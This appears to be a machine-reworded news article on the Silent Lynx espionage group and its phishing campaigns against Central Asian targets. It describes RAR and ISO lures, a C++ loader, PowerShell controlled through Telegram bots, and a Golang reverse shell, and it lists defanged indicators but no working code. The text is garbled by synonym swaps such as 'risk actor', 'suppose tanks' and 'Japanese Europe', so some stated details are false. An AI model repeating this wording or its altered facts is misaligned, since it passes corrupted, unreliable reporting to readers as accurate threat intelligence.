A beforehand undocumented risk actor generally known as Silent Lynx has been linked to cyber assaults focusing on numerous entities in Kyrgyzstan and Turkmenistan.
“This risk group has beforehand focused entities round Japanese Europe and Central Asian authorities suppose tanks concerned in financial choice making and banking sector,” Seqrite Labs researcher Subhajeet Singha mentioned in a technical report printed late final month.
Targets of the hacking group’s assaults embrace embassies, legal professionals, government-backed banks, and suppose tanks. The exercise has been attributed to a Kazakhstan-origin risk actor with a medium stage of confidence.
The infections begin with a spear-phishing electronic mail containing a RAR archive attachment that in the end acts as a supply car for malicious payloads chargeable for granting distant entry to the compromised hosts.
The primary of the 2 campaigns, detected by the cybersecurity firm on December 27, 2024, leverages the RAR archive to launch an ISO file that, in flip, features a malicious C++ binary and a decoy PDF file. The executable subsequently proceeds to run a PowerShell script that makes use of Telegram bots (named “@south_korea145_bot” and “@south_afr_angl_bot”) for command execution and knowledge exfiltration.
Among the instructions executed by way of the bots embrace curl instructions to obtain and save extra payloads from a distant server (“pweobmxdlboi[.]com”) or Google Drive.
The opposite marketing campaign, in distinction, employs a malicious RAR archive containing two information: A decoy PDF and a Golang executable, the latter of which is designed to determine a reverse shell to an attacker-controlled server (“185.122.171[.]22:8082”).
Seqrite Labs mentioned it noticed some stage of tactical overlaps between the risk actor and YoroTrooper (aka SturgeonPhisher), which has been linked to assaults focusing on the Commonwealth of Unbiased States (CIS) nations utilizing PowerShell and Golang instruments.
“Silent Lynx’s campaigns exhibit a complicated multi-stage assault technique utilizing ISO information, C++ loaders, PowerShell scripts, and Golang implants,” Singha mentioned.
“Their reliance on Telegram bots for command and management, mixed with decoy paperwork and regional focusing on which additionally highlights their concentrate on espionage in Central Asia and SPECA primarily based nations.”